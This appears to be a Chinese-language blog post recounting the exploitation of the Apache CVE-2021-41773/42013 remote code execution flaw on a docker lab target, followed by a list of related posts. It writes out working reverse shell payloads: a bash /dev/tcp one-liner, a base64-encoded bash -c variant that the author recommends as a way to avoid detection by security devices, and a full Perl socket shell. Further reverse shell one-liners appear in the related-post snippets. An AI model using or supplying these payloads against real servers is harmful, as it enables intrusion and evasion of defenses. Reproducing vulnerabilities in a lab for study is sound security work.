apache-CVE-2021-41773[42013]-反弹shell

原创 已于 2022-02-21 21:14:50 修改 · 2k 阅读 · 5 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#apache #bash #linux #webshell #反弹shell
于 2022-02-06 17:24:41 首次发布
本文探讨了Apache CVE-2021-41773/42013漏洞的利用,重点在于通过bash和perl实现远程代码执行,解决dash与bash兼容性问题,并分享了提权和环境适应的实战经验。

CVE-2021-41773-反弹shell

apache-CVE-2021-41773/42013 中存在RCE,可远程执行代码,本想利用bash反弹一个shell,奈何一直没有成功

bash -i >& /de/tcp/ip/port 0>&1

经典的bash反弹,确定环境和语句都没问题后,本地查看了靶机的日志,看到有如下报错,
在这里插入图片描述
很奇怪,为什么会有一个syntax error:Bad fd number的错误呢,而在本地kali中直接执行该语句,是没有问题的,百思不得姐,网上百度了以下,最终发现,原来不止我一个人,https://www.cnblogs.com/peace-and-romance/p/15726877.html
在这里插入图片描述
在较新的ubuntu中,/bin/sh 指向的为dash,而我们反弹shell中用到的为bash,dash和bash语法方面不一样,在靶机环境中看下/bin/sh的指向
在这里插入图片描述
果然是指向了dash,网上的解决办法是将dash重新变回bash,或者将shell脚本放在文件中执行,但真实的攻击环境中,权限不够,肯定是该不了sh的指向的,其实可以利用bash -c 参数,反弹shell POC如下

bash -c '{echo,payload_base64}|{base64,-d}|{bash,-i}'

将payload 先编码再解码,这样可以不仅可以防止反弹shell的特征太过明显,导致被安全设备拦截,还可以做到一致性通用sh环境,新的payload如下:
bash -i >& /dev/tcp/192.168.65.137/9999 0>&1 先base64编码得:YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY1LjEzNy85OTk5IDA+JjEK,替换payload_base64,最终可得

bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY1LjEzNy85OTk5IDA+JjEK}|{base64,-d}|{bash,-i}'

重新执行以上payload,查看监听处,反弹成功,如图
在这里插入图片描述

perl反弹

查看上次per反弹脚本的日志,应该是语法的问题,
在这里插入图片描述

语法报错,双引号没有闭合,难道是上次太急写错了?
重新来一次,payload如下:

perl -e 'use Socket;$i="192.168.65.137";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

这次果然成功,如图
在这里插入图片描述
推荐freebuff上总结的一篇非常好的反弹shell的博文,https://www.freebuf.com/articles/web/247967.html,可参考。
虽然反弹了shell,成功远程到了系统,可是得到的用户是daemon,这也很正常,因为docker环境下不可能得到高权限的用户,下一步自然是提权等下个章节再写上

【安全漏洞】CVE-2021-41773CVE-2021-42013漏洞分析
HBohan的博客
10-16 2466
CVE-2021-41773 漏洞成因 Apache HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径参数进行规范化时会先进行url解码,然后判断是否存在…/的路径穿越符,如下所示: while (path[l] != '\0') { if ((flags & AP_NORMALIZE_DECODE_UNRESERVED) && path[l] == '%' && apr_isxdigit(p
CVE-2021-44228 Apache log4j 远程命令执行漏洞
mirocky的博客
10-26 1353
log4j(log for java)是由Java编写的可靠、灵活的日志框架,是Apache旗下的一个开源项目,使用Log4j,我们更加方便的记录了日志信息,它不但能控制日志输出的目的地,也能控制日志输出的内容格式;通过定义不同的日志级别,可以更加精确的控制日志的生成过程,从而达到我们应用的需求;由于log4j提供了lookup机制,使日志中的${}也可进行执行,在其中输入JNDI的payload,即可进行执行。此处必须复制无版本号的rmi,否则不会成功,理由未知。使用开源的dnslog:ceye.io。
CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现
weixin_45260839的博客
06-03 7120
CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现
CVE-2021-41773 目录穿越复现并反弹shell
prcool的博客
02-01 4638
Apache HTTP Server 2.4.49 路径穿越漏洞(CVE-2021-41773Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。
CVE-2021-41773 漏洞复现
爱吃仡坨的Blog
10-13 880
Apache HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径参数进行规范化时会先进行url解码,然后判断是否存在../的路径穿越符当检测到路径中存在%字符时,如果紧跟的2个字符是十六进制字符,就会进行url解码,将其转换成标准字符,如%2e->.,转换完成后会判断是否存在../。
apache-CVE-2021-41773[42013]-漏洞复现
csd_ct的专栏
02-05 4084
apache-CVE-2021-41773[42013] 验证及复现 CVE-2021-41773 影响范围为2.4.49 CVE-2021-42013 影响范围为2.4.49/50 漏洞验证 4177342013在10月份时,被暴出目录穿越和远程命令执行,虽然只影响了apache的49/50版本,但是RCE漏洞,POC已公开,还是有较强的杀伤力。为了快速验证一下该漏洞,使用vulfocus提供的在线的靶场,开启应用,如图 访问应用首页,可得到apche服务器版本信息,如图, 验证目录遍历 利用网上爆
Apache(2.4.49 2.4.50)--目录遍历--命令执行--(CVE-2021-42013)&&(CVE-2021-41773)
weixin_74985952的博客
09-22 193
Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。
docker搭建Apache漏洞环境并实现其中几个相关漏洞(centos kali)
weixin_74182283的博客
03-30 1799
Apache(音译为阿帕奇)是世界使用排名第一(应该已经被取代了)的Web服务器软件。它可以运行在几乎所有广泛使用的计算 机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它可以运行在几乎所有广泛使用的计算机平台上。Apache源于NCSA httpd服务器,经过多次修改,成为世界上最流行的Web服务器软件之一。Apache取 自“a patchy server”的读音,意思是充满补丁的服务器,因为它是自由软件,所以不断有人来为它开发 新的功能、新的特性、修改原来的缺陷。
令人烦躁的多层网络
qq_53086690的博客
12-06 453
这里是noobteam公众号。我们主要是分享一些自己学到的东西和遇到的困难。 今天带给大家的是vulfocus靶场里的令人烦躁的多层网络。 打开网页 是apache的页面。查看返回包来确定是哪个版本 从返回包的Server中的版本信息可以看到是apache2.4.49版本。 在apache2.4.49版本存在cve-2021-41773\cve-2021-42013漏洞。 利用工具进行检测 确实存在漏洞。然后对漏洞进行利用这里可以直接用此工具进行RCE 可以读取到/tmp下的flag。 第二种办法就
红队常用命令
热门推荐
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
05-11 1万+
原文链接。
Linux和Windows反弹shell以及变种
SHELLCODE_8BIT的博客
04-07 2620
Linux bash -i >& /dev/tcp/127.0.0.1/2333 0>&1 bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}' Windows
有用的Bash命令
cassper的专栏
10-21 753
拷贝所有的C文件到目录aa find . -name "*.c" | xargs -i cp {} daemon/aa/ 把所有C文件,重新命名为.c.bkfind . -name "*.c" | xargs -i mv {} {}.bk 把所有.*文件,重新命名为.suffixls | awk -F . {print "mv "$0" "$1"/.suffix"
CVE-2021-41773&&CVE-2021-42013复现
weixin_42345596的博客
10-09 5281
CVE-2021-41773 漏洞原理 Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。在其 2.4.49 版本中,引入了一个路径体验,满足下面两个条件的 Apache 服务器将受到影响: 版本等于2.4.49 <Directory />Require all granted</Directory>(默认情况下是允许被访问的)。 攻击者利用这个漏洞,可以读取到Apache服务器Web目录以外的其他文件,或者读取Web中的脚本源码,或者在
Apache漏洞复现:【CVE-2021-42013】&【CVE_2021_41773】&【CVE-2017-15715】
MateSnake的博客
05-29 2029
Apache漏洞复现:【CVE-2021-42013】&【CVE_2021_41773】&【CVE-2017-15715】
b64弹 shell
Withdraw_end的博客
05-06 319
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzUueHgueHgueHgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}”
长安战疫网络安全卫士守护赛 Shiro?
FSecurity的博客
01-14 2738
赛题:Shiro? 需要准备的环境: 反弹shell需要准备VPS、JNDI-Injection-Exploit工具启动rmi和ldap服务 JNDI-Injection-Exploit 需要jdk、mvn环境编译 VPS centos7 mvn jdk 打开赛题 测试存在漏洞 这里我用的是VPS的外网地址 成功获取到请求响应 反弹shell步骤 bash -i >&/dev/tcp/x.x.x.x/1111 0>&1 bash -c {echo,上面命令base64编码
apache log4j vulfocus 复现
weixin_45498459的博客
05-12 455
环境配置 cenos7 搭建docker 拉去vulfocus靶场 kali 如果这不长时间卡顿 就是网络的问题 可以尝试终止命令重新下载。同学5g网真的块 docker pull vulfocus/vulfocus:latest 拉取docker环境 docker run -d -p 801:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.137.11 vulfocus/vulf...
反弹shell方式汇总
yj520400的博客
04-09 1154
攻击机:目标机:或者保存为lltest_tcp.ps1文件WebClient).lltest_tcp.ps1 如下:function$clientSocketsTCPClient'[host]'[port]$stream$clientGetStream();
apache-CVE-2021-41773[42013]-本地验证
csd_ct的专栏
02-06 3370
cve-2021-41773本地验证 上次在验证41773时,使用bash命令反弹shell不成功,vulfocus上提供的时在线靶场环境有时间限制,且无法看到后台日志,不知道时哪里出错了,于是决定从0到1开始,在本地搭建一个实验环境,看看是哪里出现了问题 搭建本地验证环境 docker 中直接拉取apache 2.4.49的镜像 docker pull httpd:2.4.49 docker images 查看镜像,如图 启动该镜像,运行apache, docker run -d -p 80:80
浅谈反弹shell
weixin_53284312的博客
01-12 2831
反弹shell
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值